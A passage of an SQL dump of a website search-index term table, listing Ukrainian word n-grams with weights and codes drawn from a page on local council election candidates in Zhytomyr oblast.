петрович',0,1,1.5333,'а000',1,'*'),(1628106,'аркадій петрович політична','аркадій петрович політична',0,1,1.8667,'а000',1,'*'),(1628107,'барвінки','барвінки',0,0,0.5333,'б000',1,'*'),(1628108,'барвінки завідуюча','барвінки завідуюча',0,1,1.6,'б000',1,'*'),(1628109,'барвінки завідуюча місце','барвінки завідуюча місце',0,1,1.8,'б000',1,'*'),(1628110,'барвінки малинський','барвінки малинський',0,1,1.6333,'б000',1,'*'),(1628111,'барвінки малинський р-н','барвінки малинський р-н',0,1,1.7667,'б000',1,'*'),(1628112,'батьківщина 1','батьківщина 1',0,1,1.4333,'б000',1,'*'),(1628113,'батьківщина 1 4.55','батьківщина 1 4.55',0,1,1.6,'б000',1,'*'),(1628114,'батьківщина громадянин','батьківщина громадянин',0,1,1.7333,'б000',1,'*'),(1628115,'батьківщина громадянин україни','батьківщина громадянин україни',0,1,2,'б000',1,'*'),(1628116,'батькові висування','батькові висування',0,1,1.6,'б000',1,'*'),(1628117,'батькові висування відомості','батькові висування відомості',0,1,1.9333,'б000',1,'*'),(1628118,'безпартійна будинок','безпартійна будинок',0,1,1.6333,'б000',1,'*'),(1628119,'безпартійна будинок культури','безпартійна будинок культури',0,1,1.9333,'б000',1,'*'),(1628120,'безпартійна головківська','безпартійна головківська',0,1,1.8,'б000',1,'*'),(1628121,'безпартійна головківська зош','безпартійна головківська зош',0,1,1.9333,'б000',1,'*'),(1628122,'безпартійна головківський','безпартійна головківський',0,1,1.8333,'б000',1,'*'),(1628123,'безпартійна головківський днз','безпартійна головківський днз',0,1,1.9667,'б000',1,'*'),(1628124,'безпартійна перукарня','безпартійна перукарня',0,1,1.7,'б000',1,'*'),(1628125,'безпартійна перукарня kristina','безпартійна перукарня kristina',0,1,2,'б26235',1,'*'),(1628126,'безпартійна посп','безпартійна посп',0,1,1.5333,'б000',1,'*'),(1628127,'безпартійна посп скуратівське','безпартійна посп скуратівське',0,1,1.9667,'б000',1,'*'),(1628128,'безпартійна скуратівська','безпартійна скуратівська',0,1,1.8,'б000',1,'*'),(1628129,'безпартійна скуратівська сільська','безпартійна скуратівська сільська',0,1,2,'б000',1,'*'),(1628130,'безпартійна фоп','безпартійна фоп',0,1,1.5,'б000',1,'*'),(1628131,'безпартійна фоп майстренко','безпартійна фоп майстренко',0,1,1.8667,'б000',1,'*'),(1628132,'безпартійна фоп філоненко','безпартійна фоп філоненко',0,1,1.8333,'б000',1,'*'),(1628133,'безпартійна чоповицька','безпартійна чоповицька',0,1,1.7333,'б000',1,'*'),(1628134,'безпартійна чоповицька селищна','безпартійна чоповицька селищна',0,1,2,'б000',1,'*'),(1628135,'безпартійний верховна','безпартійний верховна',0,1,1.7,'б000',1,'*'),(1628136,'безпартійний верховна рада','безпартійний верховна рада',0,1,1.8667,'б000',1,'*'),(1628137,'безпартійний владівська','безпартійний владівська',0,1,1.7667,'б000',1,'*'),(1628138,'безпартійний владівська зош','безпартійний владівська зош',0,1,1.9,'б000',1,'*'),(1628139,'безпартійний дп','безпартійний дп',0,1,1.5,'б000',1,'*'),(1628140,'безпартійний дп малинський','безпартійний дп малинський',0,1,1.8667,'б000',1,'*'),(1628141,'безпартійний йосипівська','безпартійний йосипівська',0,1,1.8,'б000',1,'*'),(1628142,'безпартійний йосипівська зош','безпартійний йосипівська зош',0,1,1.9333,'б000',1,'*'),(1628143,'безпартійний кнп','безпартійний кнп',0,1,1.5333,'б000',1,'*'),(1628144,'безпартійний кнп чоповицький','безпартійний кнп чоповицький',0,1,1.9333,'б000',1,'*'),(1628145,'безпартійний тов фнк','безпартійний тов фнк',0,1,1.6667,'б000',1,'*'),(1628146,'безпартійний фермерське','безпартійний фермерське',0,1,1.7667,'б000',1,'*'),(1628147,'безпартійний фермерське господарство','безпартійний фермерське господарство',0,1,2,'б000',1,'*'),(1628148,'безпартійний чоповицька','безпартійний чоповицька',0,1,1.7667,'б000',1,'*'),(1628149,'безпартійний чоповицька селищна','безпартійний чоповицька селищна',0,1,2,'б000',1,'*'),(1628150,'будинок','будинок',0,0,0.4667,'б000',1,'*'),(1628151,'будинок культури','будинок культури',0,1,1.5333,'б000',1,'*'),(1628152,'будинок культури с','будинок культури с',0,1,1.6,'б000',1,'*'),(1628153,'в\'ячеслав петрович','в петрович',0,1,1.6,'в000',1,'*'),(1628154,'в\'ячеслав петрович політична','в петрович політична',0,1,1.9333,'в000',1,'*'),(1628155,'відділу кадрового','відділу кадрового',0,1,1.5667,'в000',1,'*'),(1628156,'відділу кадрового і','відділу кадрового і',0,1,1.6333,'в000',1,'*'),(1628157,'відділу місце','відділу місце',0,1,1.4333,'в000',1,'*'),(1628158,'відділу місце проживання','відділу місце проживання',0,1,1.8,'в000',1,'*'),(1628159,'віктор володимирович','віктор володимирович',0,1,1.6667,'в000',1,'*'),(1628160,'віктор володимирович політична','віктор володимирович політична',0,1,2,'в000',1,'*'),(1628161,'віта','віта',0,0,0.2667,'в000',1,'*'),(1628162,'віта валентинівна','віта валентинівна',0,1,1.5667,'в000',1,'*'),(1628163,'віта валентинівна політична','віта валентинівна політична',0,1,1.9,'в000',1,'*'),(1628164,'валентинівна','валентинівна',0,0,0.8,'в000',1,'*'),(1628165,'валентинівна політична','валентинівна політична',0,1,1.7333,'в000',1,'*'),(1628166,'валентинівна політична партія','валентинівна політична партія',0,1,1.9667,'в000',1,'*'),(1628167,'валентина василівна','валентина василівна',0,1,1.6333,'в000',1,'*'),(1628168,'валентина василівна політична','валентина василівна політична',0,1,1.9667,'в000',1,'*'),(1628169,'василівна політична','василівна політична',0,1,1.6333,'в000',1,'*'),(1628170,'василівна політична партія','василівна політична партія',0,1,1.8667,'в000',1,'*'),(1628171,'васильович політична','васильович політична',0,1,1.6667,'в000',1,'*'),(1628172,'васильович політична партія','васильович політична партія',0,1,1.9,'в000',1,'*'),(1628173,'верховна','верховна',0,0,0.5333,'в000',1,'*'),(1628174,'верховна рада','верховна рада',0,1,1.4333,'в000',1,'*'),(1628175,'верховна рада україни','верховна рада україни',0,1,1.7,'в000',1,'*'),(1628176,'висування','висування',0,0,0.6,'в000',1,'*'),(1628177,'висування відомості','висування відомості',0,1,1.6333,'в000',1,'*'),(1628178,'висування відомості про','висування відомості про',0,1,1.7667,'в000',1,'*'),(1628179,'висування назва','висування назва',0,1,1.5,'в000',1,'*'),(1628180,'висування назва політичної','висування назва політичної',0,1,1.8667,'в000',1,'*'),(1628181,'висунула кандидата','висунула кандидата',0,1,1.6,'в000',1,'*'),(1628182,'висунула кандидата або','висунула кандидата або',0,1,1.7333,'в000',1,'*'),(1628183,'вихователь','вихователь',0,0,0.6667,'в000',1,'*'),(1628184,'вихователь місце','вихователь місце',0,1,1.5333,'в000',1,'*'),(1628185,'вихователь місце проживання','вихователь місце проживання',0,1,1.9,'в000',1,'*'),(1628186,'вища безпартійна будинок','вища безпартійна будинок',0,1,1.8,'в000',1,'*'),(1628187,'вища безпартійна головківський','вища безпартійна головківський',0,1,2,'в000',1,'*'),(1628188,'вища безпартійна посп','вища безпартійна посп',0,1,1.7,'в000',1,'*'),(1628189,'вища безпартійна чоповицька','вища безпартійна чоповицька',0,1,1.9,'в000',1,'*'),(1628190,'вища безпартійний верховна','вища безпартійний верховна',0,1,1.8667,'в000',1,'*'),(1628191,'вища безпартійний владівська','вища безпартійний владівська',0,1,1.9333,'в000',1,'*'),(1628192,'вища безпартійний дп','вища безпартійний дп',0,1,1.6667,'в000',1,'*'),(1628193,'вища безпартійний йосипівська','вища безпартійний йосипівська',0,1,1.9667,'в000',1,'*'),(1628194,'вища безпартійний кнп','вища безпартійний кнп',0,1,1.7,'в000',1,'*'),(1628195,'вища безпартійний фермерське','вища безпартійний фермерське',0,1,1.9333,'в000',1,'*'),(1628196,'вища безпартійний чоповицька','вища безпартійний чоповицька',0,1,1.9333,'в000',1,'*'),(1628197,'владівка','владівка',0,0,0.5333,'в000',1,'*'),(1628198,'владівка малинський','владівка малинський',0,1,1.6333,'в000',1,'*'),(1628199,'владівка малинський р-н','владівка малинський р-н',0,1,1.7667,'в000',1,'*'),(1628200,'владівська','владівська',0,0,0.6667,'в000',1,'*'),(1628201,'владівська зош','владівська зош',0,1,1.4667,'в000',1,'*'),(1628202,'владівська зош директор','владівська зош директор',0,1,1.7667,'в000',1,'*'),(1628203,'володимир','володимир',0,0,0.6,'в000',1,'*'),(1628204,'володимир іванович','володимир іванович',0,1,1.6,'в000',1,'*'),(1628205,'володимир іванович політична','володимир іванович політична',0,1,1.9333,'в000',1,'*'),(1628206,'володимирівна політична','володимирівна політична',0,1,1.7667,'в000',1,'*'),(1628207,'володимирівна політична партія','володимирівна політична партія',0,1,2,'в000',1,'*'),(1628208,'володимирович політична','володимирович політична',0,1,1.7667,'в000',1,'*'),(1628209,'володимирович політична партія','володимирович політична партія',0,1,2,'в000',1,'*'),(1628210,'вчитель','вчитель',0,0,0.4667,'в000',1,'*'),(1628211,'вчитель місце','вчитель місце',0,1,1.4333,'в000',1,'*'),(1628212,'вчитель місце проживання','вчитель місце проживання',0,1,1.8,'в000',1,'*'),(1628213,'галина павлівна','галина павлівна',0,1,1.5,'г000',1,'*'),(1628214,'галина павлівна політична','галина павлівна політична',0,1,1.8333,'г000',1,'*'),(1628215,'головківська','головківська',0,0,0.8,'г000',1,'*'),(1628216,'головківська зош','головківська зош',0,1,1.5333,'г000',1,'*'),(1628217,'головківська зош вчитель','головківська зош вчитель',0,1,1.8,'г000',1,'*'),(1628218,'головківський','головківський',0,0,0.8667,'г000',1,'*'),(1628219,'головківський днз','головківський днз',0,1,1.5667,'г000',1,'*'),(1628220,'головківський днз вихователь','головківський днз вихователь',0,1,1.9333,'г000',1,'*'),(1628221,'головки','головки',0,0,0.4667,'г000',1,'*'),(1628222,'головки малинський','головки малинський',0,1,1.6,'г000',1,'*'),(1628223,'головки малинський р-н','головки малинський р-н',0,1,1.7333,'г000',1,'*'),(1628224,'головний лікар','головний лікар',0,1,1.4667,'г000',1,'*'),(1628225,'головний лікар місце','головний лікар місце',0,1,1.6667,'г000',1,'*'),(1628226,'господарство слава','господарство слава',0,1,1.6,'г000',1,'*'),(1628227,'господарство слава полісся','господарство слава полісся',0,1,1.8667,'г000',1,'*'),(1628228,'грищенко т','грищенко т',0,1,1.3333,'г000',1,'*'),(1628229,'грищенко т м','грищенко т м',0,1,1.4,'г000',1,'*'),(1628230,'дєньгаєва','дєньгаєва',0,0,0.6,'д000',1,'*'),(1628231,'дєньгаєва ніна','дєньгаєва ніна',0,1,1.4667,'д000',1,'*'),(1628232,'дєньгаєва ніна олександрівна','дєньгаєва ніна олександрівна',0,1,1.9333,'д000',1,'*'),(1628233,'депутатів політична','депутатів політична',0,1,1.6333,'д000',1,'*'),(1628234,'депутатів політична партія','депутатів політична партія',0,1,1.8667,'д000',1,'*'),(1628235,'депутата 1','депутата 1',0,1,1.3333,'д000',1,'*'),(1628236,'депутата 1 дєньгаєва','депутата 1 дєньгаєва',0,1,1.6667,'д000',1,'*'),(1628237,'депутата україни','депутата україни',0,1,1.5333,'д000',1,'*'),(1628238,'депутата україни грищенко','депутата україни грищенко',0,1,1.8333,'д000',1,'*'),(1628239,'депутати чоповицької','депутати чоповицької',0,1,1.6667,'д000',1,'*'),(1628240,'депутати чоповицької селищної','депутати чоповицької селищної',0,1,1.9667,'д000',1,'*'),(1628241,'днз','днз',0,0,0.2,'д000',1,'*'),(1628242,'днз вихователь','днз вихователь',0,1,1.4667,'д000',1,'*'),(1628243,'днз вихователь місце','днз вихователь місце',0,1,1.6667,'д000',1,'*'),(1628244,'допомоги','допомоги',0,0,0.5333,'д000',2,'*'),(1628245,'допомоги головний','допомоги головний',0,1,1.5667,'д000',1,'*'),(1628246,'допомоги головний лікар','допомоги головний лікар',0,1,1.7667,'д000',1,'*'),(1628247,'дп малинський','дп малинський',0,1,1.4333,'д000',1,'*'),(1628248,'дп малинський лг','дп малинський лг',0,1,1.5333,'д000',1,'*'),(1628249,'дударенко','дударенко',0,0,0.6,'д000',1,'*'),(1628250,'дударенко ірина','дударенко ірина',0,1,1.5,'д000',1,'*'),(1628251,'дударенко ірина рустемівна','дударенко ірина рустемівна',0,1,1.8667,'д000',1,'*'),(1628252,'дученко','дученко',0,0,0.4667,'д000',1,'*'),(1628253,'дученко крістіна','дученко крістіна',0,1,1.5333,'д000',1,'*'),(1628254,'дученко крістіна володимирівна','дученко крістіна володимирівна',0,1,2,'д000',1,'*'),(1628255,'ельфа','ельфа',0,0,0.3333,'е000',1,'*'),(1628256,'ельфа інженер','ельфа інженер',0,1,1.4333,'е000',1,'*'),(1628257,'ельфа інженер з','ельфа інженер з',0,1,1.5,'е000',1,'*'),(1628258,'житомирська обл 1','житомирська обл 1',0,1,1.5667,'ж000',1,'*'),(1628259,'житомирська обл 2','житомирська обл 2',0,1,1.5667,'ж000',1,'*'),(1628260,'житомирська обл 3','житомирська обл 3',0,1,1.5667,'ж000',1,'*'),(1628261,'житомирська обл 4','житомирська обл 4',0,1,1.5667,'ж000',1,'*'),(1628262,'житомирська обл 5','житомирська обл 5',0,1,1.5667,'ж000',1,'*'),(1628263,'житомирська обл 6','житомирська обл 6',0,1,1.5667,'ж000',1,'*'),(1628264,'житомирська обл 7','житомирська обл 7',0,1,1.5667,'ж000',1,'*'),(1628265,'житомирська обл 8','житомирська обл 8',0,1,1.5667,'ж000',1,'*'),(1628266,'з охорони','з охорони',0,1,1.3,'з000',1,'*'),(1628267,'з охорони праці','з охорони праці',0,1,1.5,'з000',1,'*'),(1628268,'забезпечення','забезпечення',0,0,0.8,'з000',1,'*'),(1628269,'забезпечення місце','забезпечення місце',0,1,1.6,'з000',1,'*'),(1628270,'забезпечення місце проживання','забезпечення місце проживання',0,1,1.9667,'з000',1,'*'),(1628271,'загребля','загребля',0,0,0.5333,'з000',1,'*'),(1628272,'загребля малинський','загребля малинський',0,1,1.6333,'з000',1,'*'),(1628273,'загребля малинський р-н','загребля малинський р-н',0,1,1.7667,'з000',1,'*'),(1628274,'закусило','закусило',0,0,0.5333,'з000',1,'*'),(1628275,'закусило віта','закусило віта',0,1,1.4333,'з000',1,'*'),(1628276,'закусило віта валентинівна','закусило віта валентинівна',0,1,1.8667,'з000',1,'*'),(1628277,'зош','зош',0,0,0.2,'з000',1,'*'),(1628278,'зош вчитель','зош вчитель',0,1,1.3667,'з000',1,'*'),(1628279,'зош вчитель місце','зош вчитель місце',0,1,1.5667,'з000',1,'*'),(1628280,'зош директор','зош директор',0,1,1.4,'з000',1,'*'),(1628281,'зош директор місце','зош директор місце',0,1,1.6,'з000',1,'*'),(1628282,'йосипівка','йосипівка',0,0,0.6,'й000',1,'*'),(1628283,'йосипівка малинський','йосипівка малинський',0,1,1.6667,'й000',1,'*'),(1628284,'йосипівка малинський р-н','йосипівка малинський р-н',0,1,1.8,'й000',1,'*'),(1628285,'йосипівська','йосипівська',0,0,0.7333,'й000',1,'*'),(1628286,'йосипівська зош','йосипівська зош',0,1,1.5,'й000',1,'*'),(1628287,'йосипівська зош директор','йосипівська зош директор',0,1,1.8,'й000',1,'*'),(1628288,'кадрового','кадрового',0,0,0.6,'к000',1,'*'),(1628289,'кадрового і','кадрового і',0,1,1.3667,'к000',1,'*'),(1628290,'кадрового і правового','кадрового і правового',0,1,1.7,'к000',1,'*'),(1628291,'кандидата або','кандидата або',0,1,1.4333,'к000',1,'*'),(1628292,'кандидата або самовисування','кандидата або самовисування',0,1,1.9,'к000',1,'*'),(1628293,'кнп','кнп',0,0,0.2,'к000',1,'*'),(1628294,'кнп чоповицький','кнп чоповицький',0,1,1.5,'к000',1,'*'),(1628295,'кнп чоповицький центр','кнп чоповицький центр',0,1,1.7,'к000',1,'*'),(1628296,'кондратчук','кондратчук',0,0,0.6667,'к000',1,'*'),(1628297,'кондратчук галина','кондратчук галина',0,1,1.5667,'к000',1,'*'),(1628298,'кондратчук галина павлівна','кондратчук галина павлівна',0,1,1.8667,'к000',1,'*'),(1628299,'косинський','косинський',0,0,0.6667,'к000',1,'*'),(1628300,'косинський володимир','косинський володимир',0,1,1.6667,'к000',1,'*'),(1628301,'косинський володимир іванович','косинський володимир іванович',0,1,1.9667,'к000',1,'*'),(1628302,'крістіна','крістіна',0,0,0.5333,'к000',1,'*'),(1628303,'крістіна володимирівна','крістіна володимирівна',0,1,1.7333,'к000',1,'*'),(1628304,'крістіна володимирівна політична','крістіна володимирівна політична',0,1,2,'к000',1,'*'),(1628305,'край 16 72.73','край 16 72.73',0,1,1.4333,'к000',1,'*'),(1628306,'край громадянин','край громадянин',0,1,1.5,'к000',1,'*'),(1628307,'край громадянин україни','край громадянин україни',0,1,1.7667,'к000',1,'*'),(1628308,'край громадянка','край громадянка',0,1,1.5,'к000',1,'*'),(1628309,'край громадянка україни','край громадянка україни',0,1,1.7667,'к000',1,'*'),(1628310,'культури с','культури с',0,1,1.3333,'к000',1,'*'),(1628311,'культури с барвінки','культури с барвінки',0,1,1.6333,'к000',1,'*'),(1628312,'лікар','лікар',0,0,0.3333,'л000',1,'*'),(1628313,'лікар місце','лікар місце',0,1,1.3667,'л000',1,'*'),(1628314,'лікар місце проживання','лікар місце проживання',0,1,1.7333,'л000',1,'*'),(1628315,'лісничий','лісничий',0,0,0.5333,'л000',1,'*'),(1628316,'лісничий місце','лісничий місце',0,1,1.4667,'л000',1,'*'),(1628317,'лісничий місце проживання','лісничий місце проживання',0,1,1.8333,'л000',1,'*'),(1628318,'лісу','лісу',0,0,0.2667,'л000',1,'*'),(1628319,'лісу місце','лісу місце',0,1,1.3333,'л000',1,'*'),(1628320,'лісу місце проживання','лісу місце проживання',0,1,1.7,'л000',1,'*'),(1628321,'лг','лг',0,0,0.1333,'л000',1,'*'),(1628322,'лг апк','лг апк',0,1,1.2,'л000',1,'*'),(1628323,'лг апк лісничий','лг апк лісничий',0,1,1.5,'л000',1,'*'),(1628324,'лг апк майстер','лг апк майстер',0,1,1.4667,'л000',1,'*'),(1628325,'людмила миколаївна','людмила миколаївна',0,1,1.6,'л000',1,'*'),(1628326,'людмила миколаївна політична','людмила миколаївна політична',0,1,1.9333,'л000',1,'*'),(1628327,'м місце','м місце',0,1,1.2333,'м000',1,'*'),(1628328,'м місце проживання','м місце проживання',0,1,1.6,'м000',1,'*'),(1628329,'м малин житомирська','м малин житомирська',0,1,1.6333,'м000',1,'*'),(1628330,'м малин малинський','м малин малинський',0,1,1.6,'м000',1,'*'),(1628331,'місце проживання с-ще','місце проживання с-ще',0,1,1.7,'м000',1,'*'),(1628332,'майстер','майстер',0,0,0.4667,'м000',1,'*'),(1628333,'майстер лісу','майстер лісу',0,1,1.4,'м000',1,'*'),(1628334,'майстер лісу місце','майстер лісу місце',0,1,1.6,'м000',1,'*'),(1628335,'майстренко т','майстренко т',0,1,1.4,'м000',1,'*'),(1628336,'майстренко т і','майстренко т і',0,1,1.4667,'м000',1,'*'),(1628337,'майстренко тетяна','майстренко тетяна',0,1,1.5667,'м000',1,'*'),(1628338,'майстренко тетяна іванівна','майстренко тетяна іванівна',0,1,1.8667,'м000',1,'*'),(1628339,'малин житомирська','малин житомирська',0,1,1.5667,'м000',1,'*'),(1628340,'малин житомирська обл','малин житомирська обл',0,1,1.7,'м000',1,'*'),(1628341,'малин малинський','малин малинський',0,1,1.5333,'м000',1,'*'),(1628342,'малин малинський р-н','малин малинський р-н',0,1,1.6667,'м000',1,'*'),(1628343,'малинський лг','малинський лг',0,1,1.4333,'м000',1,'*'),(1628344,'малинський лг апк','малинський лг апк',0,1,1.5667,'м000',1,'*'),(1628345,'медико-санітарної','медико-санітарної',0,0,1,'м000',1,'*'),(1628346,'медико-санітарної допомоги','медико-санітарної допомоги',0,1,1.8667,'м000',1,'*'),(1628347,'медико-санітарної допомоги головний','медико-санітарної допомоги головний',0,1,2,'м000',1,'*'),(1628348,'микола володимирович','микола володимирович',0,1,1.6667,'м000',1,'*'),(1628349,'микола володимирович політична','микола володимирович політична',0,1,2,'м000',1,'*'),(1628350,'микола миколайович','микола миколайович',0,1,1.6,'м000',1,'*'),(1628351,'микола миколайович політична','микола миколайович політична',0,1,1.9333,'м000',1,'*'),(1628352,'миколаївна політична','миколаївна політична',0,1,1.6667,'м000',1,'*'),(1628353,'миколаївна політична партія','миколаївна політична партія',0,1,1.9,'м000',1,'*'),(1628354,'миколайович політична','миколайович політична',0,1,1.7,'м000',1,'*'),(1628355,'миколайович політична партія','миколайович політична партія',0,1,1.9333,'м000',1,'*'),(1628356,'михайло','михайло',0,0,0.4667,'м000',1,'*'),(1628357,'михайло іванович','михайло іванович',0,1,1.5333,'м000',1,'*'),(1628358,'михайло іванович самовисування','михайло іванович самовисування',0,1,2,'м000',1,'*'),(1628359,'михайло миколайович','михайло миколайович',0,1,1.6333,'м000',1,'*'),(1628360,'михайло миколайович політична','михайло миколайович політична',0,1,1.9667,'м000',1,'*'),(1628361,'мойсієнко','мойсієнко',0,0,0.6,'м000',1,'*'),(1628362,'мойсієнко микола','мойсієнко микола',0,1,1.5333,'м000',1,'*'),(1628363,'мойсієнко микола миколайович','мойсієнко микола миколайович',0,1,1.9333,'м000',1,'*'),(1628364,'ніна','ніна',0,0,0.2667,'н000',1,'*'),(1628365,'ніна олександрівна','ніна олександрівна',0,1,1.6,'н000',1,'*'),(1628366,'ніна олександрівна політична','ніна олександрівна політична',0,1,1.9333,'н000',1,'*'),(1628367,'народився 01.01.1974','народився 01.01.1974',0,1,1.6667,'н000',1,'*'),(1628368,'народився 01.01.1974 р','народився 01.01.1974 р',0,1,1.7333,'н000',1,'*'),(1628369,'народився 01.01.1977','народився 01.01.1977',0,1,1.6667,'н000',1,'*'),(1628370,'народився 01.01.1977 р','народився 01.01.1977 р',0,1,1.7333,'н000',1,'*'),(1628371,'народився 04.01.1956','народився 04.01.1956',0,1,1.6667,'н000',1,'*'),(1628372,'народився 04.01.1956 р','народився 04.01.1956 р',0,1,1.7333,'н000',1,'*'),(1628373,'народився 05.04.1989','народився 05.04.1989',0,1,1.6667,'н000',1,'*'),(1628374,'народився 05.04.1989 р','народився 05.04.1989 р',0,1,1.7333,'н000',1,'*'),(1628375,'народився 10.05.1983','народився 10.05.1983',0,1,1.6667,'н000',1,'*'),(1628376,'народився 10.05.1983 р','народився 10.05.1983 р',0,1,1.7333,'н000',1,'*'),(1628377,'народився 14.03.1979','народився 14.03.1979',0,1,1.6667,'н000',1,'*'),(1628378,'народився 14.03.1979 р','народився 14.03.1979 р',0,1,1.7333,'н000',1,'*'),(1628379,'народився 18.09.1968','народився 18.09.1968',0,1,1.6667,'н000',1,'*'),(1628380,'народився 18.09.1968 р','народився 18.09.1968 р',0,1,1.7333,'н000',1,'*'),(1628381,'народився 20.07.1967','народився 20.07.1967',0,1,1.6667,'н000',1,'*'),(1628382,'народився 20.07.1967 р','народився 20.07.1967 р',0,1,1.7333,'н000',1,'*'),(1628383,'народився 22.11.1982','народився 22.11.1982',0,1,1.6667,'н000',1,'*'),(1628384,'народився 22.11.1982 р','народився 22.11.1982 р',0,1,1.7333,'н000',1,'*'),(1628385,'народився 30.04.1960','народився 30.04.1960',0,1,1.6667,'н000',1,'*'),(1628386,'народився 30.04.1960 р','народився 30.04.1960 р',0,1,1.7333,'н000',1,'*'),(1628387,'народилася 02.10.1980','народилася 02.10.1980',0,1,1.7,'н000',1,'*'),(1628388,'народилася 02.10.1980 р','народилася 02.10.1980 р',0,1,1.7667,'н000',1,'*'),(1628389,'народилася 02.12.1993','народилася 02.12.1993',0,1,1.7,'н000',1,'*'),(1628390,'народилася 02.12.1993 р','народилася 02.12.1993 р',0,1,1.7667,'н000',1,'*'),(1628391,'народилася 05.11.1971','народилася 05.11.1971',0,1,1.7,'н000',1,'*'),(1628392,'народилася 05.11.1971 р','народилася 05.11.1971 р',0,1,1.7667,'н000',1,'*'),(1628393,'народилася 08.04.1973','народилася 08.04.1973',0,1,1.7,'н000',1,'*'),(1628394,'народилася 08.04.1973 р','народилася 08.04.1973 р',0,1,1.7667,'н000',1,'*'),(1628395,'народилася 10.10.1968','народилася 10.10.1968',0,1,1.7,'н000',1,'*'),(1628396,'народилася 10.10.1968 р','народилася 10.10.1968 р',0,1,1.7667,'н000',1,'*'),(1628397,'народилася 13.06.1963','народилася 13.06.1963',0,1,1.7,'н000',1,'*'),(1628398,'народилася 13.06.1963 р','народилася 13.06.1963 р',0,1,1.7667,'н000',1,'*'),(1628399,'народилася 20.07.1968','народилася 20.07.1968',0,1,1.7,'н000',1,'*'),(1628400,'народилася 20.07.1968 р','народилася 20.07.1968 р',0,1,1.7667,'н000',1,'*'),(1628401,'народилася 21.06.1962','народилася 21.06.1962',0,1,1.7,'н000',1,'*'),(1628402,'народилася 21.06.1962 р','народилася 21.06.1962 р',0,1,1.7667,'н000',1,'*'),(1628403,'народилася 24.06.1994','народилася 24.06.1994',0,1,1.7,'н000',1,'*'),(1628404,'народилася 24.06.1994 р','народилася 24.06.1994 р',0,1,1.7667,'н000',1,'*'),(1628405,'народилася 25.09.1978','народилася 25.09.1978',0,1,1.7,'н000',1,'*'),(1628406,'народилася 25.09.1978 р','народилася 25.09.1978 р',0,1,1.7667,'н000',1,'*'),(1628407,'народилася 30.07.1970','народилася 30.07.1970',0,1,1.7,'н000',1,'*'),(1628408,'народилася 30.07.1970 р','народилася 30.07.1970 р',0,1,1.7667,'н000',1,'*'),(1628409,'народного депутата','народного депутата',0,1,1.6,'н000',1,'*'),(1628410,'народного депутата україни','народного депутата україни',0,1,1.8667,'н000',1,'*'),(1628411,'народу 2','народу 2',0,1,1.2667,'н000',1,'*'),(1628412,'народу 2 9.09','народу 2 9.09',0,1,1.4333,'н000',1,'*'),(1628413,'народу громадянин','народу громадянин',0,1,1.5667,'н000',1,'*'),(1628414,'народу громадянин україни','народу громадянин україни',0,1,1.8333,'н000',1,'*'),(1628415,'народу громадянка','народу громадянка',0,1,1.5667,'н000',1,'*'),(1628416,'народу громадянка україни','народу громадянка україни',0,1,1.8333,'н000',1,'*'),(1628417,'начальник відділу','начальник відділу',0,1,1.5667,'н000',1,'*'),(1628418,'начальник відділу місце','начальник відділу місце',0,1,1.7667,'н000',1,'*'),(1628419,'наш край громадянин','наш край громадянин',0,1,1.6333,'н000',1,'*'),(1628420,'наш край громадянка','наш край громадянка',0,1,1.6333,'н000',1,'*'),(1628421,'недашківська','недашківська',0,0,0.8,'н000',1,'*'),(1628422,'недашківська людмила','недашківська людмила',0,1,1.6667,'н000',1,'*'),(1628423,'недашківська людмила миколаївна','недашківська людмила миколаївна',0,1,2,'н000',1,'*'),(1628424,'новобратське','новобратське',0,0,0.8,'н000',1,'*'),(1628425,'новобратське малинський','новобратське малинський',0,1,1.7667,'н000',1,'*'),(1628426,'новобратське малинський р-н','новобратське малинський р-н',0,1,1.9,'н000',1,'*'),(1628427,'о місце','о місце',0,1,1.2333,'о000',1,'*'),(1628428,'о місце проживання','о місце проживання',0,1,1.6,'о000',1,'*'),(1628429,'о о','о о',0,1,1.1,'о000',1,'*'),(1628430,'о о місце','о о місце',0,1,1.3,'о000',1,'*'),(1628431,'об\'єднання батьківщина 1','об батьківщина 1',0,1,1.8,'о000',1,'*'),(1628432,'об\'єднання батьківщина громадянин','об батьківщина громадянин',0,1,2,'о000',1,'*'),(1628433,'обл 1','обл 1',0,1,1.1667,'о000',1,'*'),(1628434,'обл 1 косинський','обл 1 косинський',0,1,1.5333,'о000',1,'*'),(1628435,'обл 1 харченко','обл 1 харченко',0,1,1.4667,'о000',1,'*'),(1628436,'обл 2','обл 2',0,1,1.1667,'о000',1,'*'),(1628437,'обл 2 раєць','обл 2 раєць',0,1,1.3667,'о000',1,'*'),(1628438,'обл 2 філоненко','обл 2 філоненко',0,1,1.5,'о000',1,'*'),(1628439,'обл 2 шпакович','обл 2 шпакович',0,1,1.4667,'о000',1,'*'),(1628440,'обл 3','обл 3',0,1,1.1667,'о000',1,'*'),(1628441,'обл 3 дученко','обл 3 дученко',0,1,1.4333,'о000',1,'*'),(1628442,'обл 3 шпакович','обл 3 шпакович',0,1,1.4667,'о000',1,'*'),(1628443,'обл 4','обл 4',0,1,1.1667,'о000',1,'*'),(1628444,'обл 4 недашківська','обл 4 недашківська',0,1,1.6,'о000',1,'*'),(1628445,'обл 4 фещенко','обл 4 фещенко',0,1,1.4333,'о000',1,'*'),(1628446,'обл 5','обл 5',0,1,1.1667,'о000',1,'*'),(1628447,'обл 5 александрук','обл 5 александрук',0,1,1.5667,'о000',1,'*'),(1628448,'обл 5 мойсієнко','обл 5 мойсієнко',0,1,1.5,'о000',1,'*'),(1628449,'обл 5 петровський','обл 5 петровський',0,1,1.5667,'о000',1,'*'),(1628450,'обл 5 шоботенко','обл 5 шоботенко',0,1,1.5,'о000',1,'*'),(1628451,'обл 6','обл 6',0,1,1.1667,'о000',1,'*'),(1628452,'обл 6 майстренко','обл 6 майстренко',0,1,1.5333,'о000',1,'*'),(1628453,'обл 6 ярошенко','обл 6 ярошенко',0,1,1.4667,'о000',1,'*'),(1628454,'обл 7','обл 7',0,1,1.1667,'о000',1,'*'),(1628455,'обл 7 дударенко','обл 7 дударенко',0,1,1.5,'о000',1,'*'),(1628456,'обл 7 кондратчук','обл 7 кондратчук',0,1,1.5333,'о000',1,'*'),(1628457,'обл 7 романчук','обл 7 романчук',0,1,1.4667,'о000',1,'*'),(1628458,'обл 8','обл 8',0,1,1.1667,'о000',1,'*'),(1628459,'обл 8 закусило','обл 8 закусило',0,1,1.4667,'о000',1,'*'),(1628460,'обл 8 олександрук','обл 8 олександрук',0,1,1.5667,'о000',1,'*'),(1628461,'обраних депутатів політична','обраних депутатів політична',0,1,1.9,'о000',1,'*'),(1628462,'обраного депутата 1','обраного депутата 